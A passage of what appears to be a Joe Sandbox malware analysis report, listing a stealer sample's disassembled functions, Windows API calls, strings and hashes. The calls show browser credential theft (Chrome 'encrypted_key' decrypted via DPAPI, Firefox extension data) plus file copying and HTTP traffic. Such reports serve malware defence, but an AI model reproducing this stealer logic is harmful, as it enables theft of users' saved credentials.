                                                                                                                                                                    • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                                    • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                                                                    • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                                                                    Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                    • String ID: =A
                                                                                                                                                                    • API String ID: 3183270410-2399317284
                                                                                                                                                                    • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                                    • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                                                                    • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                                                                    Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                    • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                    • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                                                                    Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                    • API String ID: 161838763-3310892237
                                                                                                                                                                    • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                    • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                                                                    • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                    • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                                                                    Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                      • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                                      • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                                      • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                                      • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                                      • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                      • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                      • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                    • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                    • API String ID: 2311102621-738592651
                                                                                                                                                                    • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                                                                    • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                                                                    • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                                                                    • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                                                                    Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                      • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                      • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                      • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                      • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                      • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                      • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                    • String ID: nzA
                                                                                                                                                                    • API String ID: 2104210347-1761861442
                                                                                                                                                                    • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                                                                    • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                                                                    • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                                                                    • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                                                                    Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                      • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                      • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                      • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                      • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                      • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                      • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                    • String ID: ERROR$ERROR
                                                                                                                                                                    • API String ID: 3086566538-2579291623
                                                                                                                                                                    • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                                                                    • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                                                                    Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                    • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                                    • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                                                                    • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                                    • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                                                                    Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
